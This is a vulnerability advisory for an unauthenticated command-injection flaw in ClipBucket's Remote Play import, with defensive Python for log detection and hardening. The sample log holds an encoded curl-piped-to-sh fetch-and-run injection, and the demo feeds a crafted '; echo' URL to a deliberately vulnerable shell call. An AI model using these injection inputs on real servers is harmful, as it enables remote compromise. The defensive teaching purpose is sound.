External risk intelligence

ClipBucket Remote Play Arbitrary Command Execution

CVE advisory

Severity: CRITICAL (CVSS 9.8)

CVE-2026-42846

A critical vulnerability in ClipBucket's Remote Play feature allows arbitrary command execution via a specially crafted URL. Organizations running ClipBucket v5 for video sharing are affected: the advisory describes the flaw as reachable without authentication, so an attacker could execute commands on the hosting server without first obtaining an account.

Halo Surface Signal

OS Command Injection

External exposure likelihood

Halo Surface Signal score for CVE-2026-42846: 4

ClipBucket is a video sharing platform designed to be a public-facing web application. Features such as importing videos from external URLs are core functional components of such platforms, making the application's interface commonly reachable from the internet.

PCI scan relevance

PCI Relevance for CVE-2026-42846

Yes

CVE-2026-42846 — Halo PCI Relevance: Yes. Under typical PCI ASV external scan criteria, this issue may be flagged for scan prioritization.

This vulnerability allows arbitrary command execution. PCI ASV scan rules treat any finding with a CVSS base score of 4.0 or higher as a failing result, so a CVSS 9.8 command injection flaw on an in-scope, externally reachable host would cause a scan failure.

Scan-prioritization guidance only—not a PCI DSS certification or ASV attestation.

Horizon Alert

Summary of the vulnerability and why it matters

A critical vulnerability exists in the ClipBucket video sharing platform, allowing for arbitrary command execution through specially crafted URLs. This could impact any organization using this platform for video content management and distribution.

  • Allows attackers to run commands on servers.
  • Matters if your company uses ClipBucket for video sharing.
  • Confirm relevance and exposure of ClipBucket usage.

Attack Path

How an attacker could exploit the issue

An attacker can exploit this vulnerability by leveraging the Remote Play feature within ClipBucket. This feature allows users to add videos by importing external URLs, and the vulnerability arises because the provided URL is directly incorporated into shell commands without proper sanitization. This could allow an attacker to execute arbitrary commands on the server.

  • No authentication is required, according to the advisory.
  • Triggered by submitting a malicious URL to the Remote Play import feature.
  • Results in arbitrary command execution in the context of the web application process.

Live Threat

Current exploitation, exposure, and threat context

This vulnerability could allow an unauthenticated user to execute arbitrary commands on the server when the Remote Play feature is used to import a video from an external URL.

  • Server-side commands may execute.
  • External URLs can trigger commands.
  • Server compromise is possible.

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

This vulnerability affects ClipBucket v5, a self-hosted video sharing platform. The "Remote Play" feature, which imports videos from external URLs, passes the supplied URL into a shell command without proper handling, allowing arbitrary command execution; the advisory describes this path as reachable without authentication. The team that operates the ClipBucket instances, typically the platform or application owners, should start by identifying every deployment: confirm which instances exist and whether they are reachable from the internet, determine their business criticality, and assign ownership for remediation.

  • Application owners must own the issue.
  • Verify instance exposure and criticality.
  • Plan remediation based on risk.
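The detection step this section promises can start with the web server's access log, since an injection attempt arrives as a request to the import endpoint whose URL parameter carries shell metacharacters once percent-decoded. The Python below is an added example, not code from the page or from ClipBucket: the endpoint path /actions/remote_play.php and the parameter name url are assumptions to be replaced with your deployment's real ones, and the log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed endpoint and parameter name; substitute the real Remote Play
# import path and query parameter from your ClipBucket deployment.
IMPORT_PATH = "/actions/remote_play.php"
URL_PARAM = "url"

# Common/combined access-log format: client, identity, user, [time],
# "METHOD target protocol", status, and whatever follows.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that never belong in a legitimate media URL but do appear in
# command-injection payloads. Checked after percent-decoding, because the
# application decodes the parameter before it builds the command.
SHELL_META = re.compile(r"""[;&|`$<>\\'"]|\s""")

# Constructed sample log (not real traffic): a normal import, an injection
# attempt (';curl ...|sh' percent-encoded), an unrelated request, and a
# POST whose body the access log cannot show.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2026:10:01:22 +0000] "GET /actions/remote_play.php?url=https%3A%2F%2Fvideos.example.com%2Fclip.mp4 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [12/May/2026:10:02:05 +0000] "GET /actions/remote_play.php?url=https%3A%2F%2Fvideos.example.com%2Fclip.mp4%3Bcurl%20http%3A%2F%2F198.51.100.23%2Fx.sh%7Csh HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.9 - - [12/May/2026:10:03:40 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [12/May/2026:10:04:01 +0000] "POST /actions/remote_play.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
"""


def suspicious_requests(log_text: str) -> list:
    """Return one dict per request that needs a second look: GETs to the
    import endpoint with metacharacters in the decoded URL parameter, and
    POSTs to it, whose body is invisible here and must be checked in
    application-level logs."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        if target.path != IMPORT_PATH:
            continue
        if m["method"] == "POST":
            hits.append({"ip": m["ip"], "time": m["time"], "value": None,
                         "reason": "POST to import endpoint: body not in "
                                   "access log, check application logs"})
            continue
        # parse_qs percent-decodes values and turns '+' into spaces.
        params = parse_qs(target.query, keep_blank_values=True)
        for value in params.get(URL_PARAM, []):
            if SHELL_META.search(value):
                hits.append({"ip": m["ip"], "time": m["time"], "value": value,
                             "reason": "shell metacharacters in decoded "
                                       f"{URL_PARAM} parameter"})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["reason"], hit["value"] or "")
```

Run it against the real log once the path and parameter are corrected; a match on the GET form is strong evidence of an attempt, while a POST match only tells you where to look next.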

Frequently asked questions

What is ClipBucket?

ClipBucket is an open-source platform designed for hosting and sharing video content. It functions as a web-based management system that organizations use to distribute media. Its features include tools for importing external video sources to build content libraries, which is the specific area affected by this vulnerability.

How does CVE-2026-42846 allow code execution?

This vulnerability is classified as CWE-78, OS Command Injection. The software takes a user-provided URL and incorporates it directly into a system shell command without validating or escaping the input. Because the shell cannot distinguish the intended URL from additional instructions appended to it, any shell commands embedded in that input are executed.

What triggers this arbitrary command execution?

The issue is triggered when the platform's 'Remote Play' feature processes a specially crafted URL submitted for import. Standard, legitimate imports that contain only valid URL characters do not trigger the flaw; it requires shell metacharacters (for example a command separator) that the application fails to neutralize before passing the string to the shell.
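The Attack Path section and the two FAQ answers above describe the same mechanism: a URL string concatenated into a shell command. The Python below is added here to make that concrete and to show the fix; it is not ClipBucket's code (ClipBucket is written in PHP) and does not reproduce the project's actual vulnerable call. The download tool is replaced by printf so the example runs offline, the two URLs are constructed, and the function names are illustrative.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Constructed sample inputs (not from the advisory): a legitimate media URL
# and a crafted one that appends a second command after a ';' separator.
LEGIT_URL = "https://videos.example.com/clip.mp4"
CRAFTED_URL = "https://videos.example.com/clip.mp4; echo INJECTED"

# Stand-in for the real download tool so the example runs offline:
# printf '%s\n' <url> simply echoes the URL it was handed.
FETCH_TOOL = "printf"
FETCH_FMT = "%s\\n"


def vulnerable_import(url: str) -> str:
    """The bug pattern the advisory describes: the URL is concatenated into a
    command string and handed to /bin/sh, so metacharacters in it are parsed
    as shell syntax instead of as part of the argument."""
    cmd = f"{FETCH_TOOL} '{FETCH_FMT}' {url}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_without_shell(url: str) -> str:
    """Same command with the URL as its own argv element and no shell in
    between: the tool receives the bytes verbatim, so ';' is just data."""
    return subprocess.run([FETCH_TOOL, FETCH_FMT, url],
                          capture_output=True, text=True).stdout


# Characters a media URL never legitimately contains but injection needs.
_SHELL_META = re.compile(r"""[;&|`$<>(){}\\'"]|\s""")


def validate_remote_url(url: str) -> str:
    """Input validation as the first layer: http(s) only, a host must be
    present, and no shell metacharacters or whitespace anywhere."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http(s) URLs may be imported")
    if not parts.netloc:
        raise ValueError("URL has no host")
    if _SHELL_META.search(url):
        raise ValueError("URL contains shell metacharacters or whitespace")
    return url


def hardened_import(url: str) -> str:
    """Validate, then execute without a shell. Either layer alone stops
    CRAFTED_URL; keeping both is the defence in depth a reviewer expects."""
    return run_without_shell(validate_remote_url(url))


if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_import(CRAFTED_URL)))
    print("argv only: ", repr(run_without_shell(CRAFTED_URL)))
    try:
        hardened_import(CRAFTED_URL)
    except ValueError as exc:
        print("hardened:   rejected:", exc)
```

In the vulnerable form the output has two lines, the URL and INJECTED, proving a second command ran; in the argv form the whole crafted string comes back as one literal line. In PHP the validated URL would additionally be wrapped with escapeshellarg() before it enters a command string, or passed as an array element to proc_open() (PHP 7.4 and later) so that no shell is involved at all.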

Is my ClipBucket instance at risk?

According to Halo Surface Signal, ClipBucket is typically deployed as a public-facing web application to facilitate video sharing. Because its core functions are designed to be reachable from the internet, any instance accessible from the public web faces a higher risk of being targeted by unauthorized users than those restricted to internal networks.

When should I update ClipBucket?

You should prioritize this update immediately. The first step is to locate all deployments of ClipBucket within your environment to determine which are currently active or internet-accessible. Once you have identified your instances, confirm their version and apply the patch provided in version 5.5.3 - #140 to resolve the improper command handling.
